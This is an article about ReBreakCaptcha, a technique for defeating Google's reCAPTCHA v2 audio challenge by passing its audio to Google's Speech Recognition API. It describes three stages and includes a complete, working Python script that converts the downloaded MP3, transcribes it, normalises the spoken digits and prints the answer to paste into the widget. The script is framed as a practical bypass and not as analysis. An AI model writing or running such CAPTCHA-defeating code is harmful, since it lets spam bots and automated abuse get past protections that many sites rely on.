A researcher has discovered a “logic vulnerability” that allowed him to write a Python script capable of bypassing Google’s reCAPTCHA audio challenge using another Google service, the Speech Recognition API.
The researcher, who goes online only by the name East-EE, has released proof-of-concept code on GitHub.
East-EE discovered the vulnerability in 2016 and named it ReBreakCaptcha. He said the vulnerability was still unpatched.
The proof-of-concept code lets attackers automate the process of bypassing reCAPTCHA fields, which are currently used on millions of sites to keep out spam bots.
ReBreakCaptcha works in three stages:
1. Audio Challenge – Getting the correct challenge type.
2. Recognition – Converting the audio challenge and sending it to Google’s Speech Recognition API.
3. Verification – Verifying the speech recognition result and bypassing the reCAPTCHA.
Stage 1 Audio Challenge
The challenge contains an audio recording, and the user is asked to enter the digits that are heard. This attack only works on Google reCAPTCHA v2, the current version of the reCAPTCHA service.
When clicking the “I’m not a robot” checkbox of reCAPTCHA v2, we are often presented with the following popup:
In addition, for older browsers with no audio playback support, the audio challenge can be downloaded in one click. The audio file is downloaded in MP3 format.
If instead of an audio challenge you get another challenge type, such as the text challenge that displays different pieces of text in the popup to select from, you can switch to an audio challenge by clicking the refresh button.
Stage 2 Recognition
Download the audio file and send it to the Google Speech Recognition API. Before doing so, convert it to WAV format, which is the format the Speech Recognition API expects.
There is a great Python library named SpeechRecognition for performing speech recognition, with support for several engines and APIs, online and offline.
After sending the audio to the Google Speech Recognition API through this library, the API returns the result as a string (e.g. ‘25143’).
Stage 3 Verification
Finally, copy-paste the output string from Stage 2 into the textbox and click ‘Verify’ on the reCAPTCHA widget.
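The following is an added example of how the three stages fit together in Python; it is not East-EE’s proof-of-concept code. It uses the real SpeechRecognition library calls (`Recognizer`, `AudioFile`, `record`, `recognize_google`) and assumes `ffmpeg` is installed for the MP3-to-WAV conversion. The digit-normalisation step and the retry-on-unusable-transcript behaviour are assumptions added here: the speech API may return spelled-out words (“two five one …”), spaces or trailing punctuation, none of which the widget accepts, and an unrecognisable transcript is best handled by reloading the challenge as in Stage 1. Stage 3 stays manual, as in the article: the script only produces the string to paste into the widget.

```python
"""ReBreakCaptcha-style pipeline (added example, not the original PoC).

Stage 1 (getting an audio challenge and downloading the MP3) is done in the
browser; this script covers Stage 2 and hands the result to a human for Stage 3.
"""
import re
import shutil
import subprocess
from typing import Callable, Optional

# Spelled-out digits the recogniser sometimes returns instead of numerals.
# Assumed mapping; "oh" for zero is a common speech-to-text rendering.
WORD_DIGITS = {
    "zero": "0", "oh": "0", "one": "1", "two": "2", "three": "3", "four": "4",
    "five": "5", "six": "6", "seven": "7", "eight": "8", "nine": "9",
}


def mp3_to_wav(mp3_path: str, wav_path: str) -> str:
    """Stage 2a: convert the downloaded MP3 to 16 kHz mono PCM WAV with ffmpeg.

    SpeechRecognition reads WAV/AIFF/FLAC, not MP3, so this must happen before
    the audio is sent anywhere.
    """
    if shutil.which("ffmpeg") is None:
        raise RuntimeError("ffmpeg is required for MP3 -> WAV conversion")
    subprocess.run(
        ["ffmpeg", "-y", "-loglevel", "error", "-i", mp3_path,
         "-ac", "1", "-ar", "16000", "-f", "wav", wav_path],
        check=True,
    )
    return wav_path


def recognize_with_google(wav_path: str) -> str:
    """Stage 2b: send the WAV to Google's speech API via SpeechRecognition.

    Returns the raw transcript, or "" when the API could not understand the
    audio (the caller should then reload the widget for a fresh challenge).
    """
    import speech_recognition as sr  # pip install SpeechRecognition

    recognizer = sr.Recognizer()
    with sr.AudioFile(wav_path) as source:
        audio = recognizer.record(source)
    try:
        return recognizer.recognize_google(audio, language="en-US")
    except sr.UnknownValueError:
        return ""


def transcript_to_digits(text: str) -> Optional[str]:
    """Normalise a transcript such as 'two five 1 four three.' into '25143'.

    Returns None if any token is neither a numeral nor a spelled-out digit,
    because the widget rejects anything but the plain digit string.
    """
    digits = []
    for token in re.findall(r"[a-z]+|\d", text.lower()):
        if token.isdigit():
            digits.append(token)
        elif token in WORD_DIGITS:
            digits.append(WORD_DIGITS[token])
        else:
            return None
    return "".join(digits)


def solve_audio_challenge(
    mp3_path: str,
    converter: Callable[[str, str], str] = mp3_to_wav,
    recognizer: Callable[[str], str] = recognize_with_google,
) -> Optional[str]:
    """Run Stage 2 end to end: returns the string to paste into the widget,
    or None when the challenge should be reloaded and the attempt repeated.
    The converter and recogniser are injectable so the flow can be tested
    without ffmpeg or network access."""
    wav_path = converter(mp3_path, mp3_path + ".wav")
    transcript = recognizer(wav_path)
    if not transcript:
        return None
    digits = transcript_to_digits(transcript)
    return digits or None


if __name__ == "__main__":
    import sys

    answer = solve_audio_challenge(sys.argv[1])
    print(answer if answer else "no usable transcript; reload the challenge")
```

Run it as `python rebreak.py challenge.mp3`; on success it prints the digit string for Stage 3, otherwise it tells you to refresh the widget and download a new challenge.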
As a result, we have semi-automatically used one Google service to bypass another.
Therefore, you can successfully bypass reCAPTCHA with the steps above.
Furthermore, Google is working on reCAPTCHA v3, which needs minimal user interaction and is currently referred to as Invisible reCAPTCHA.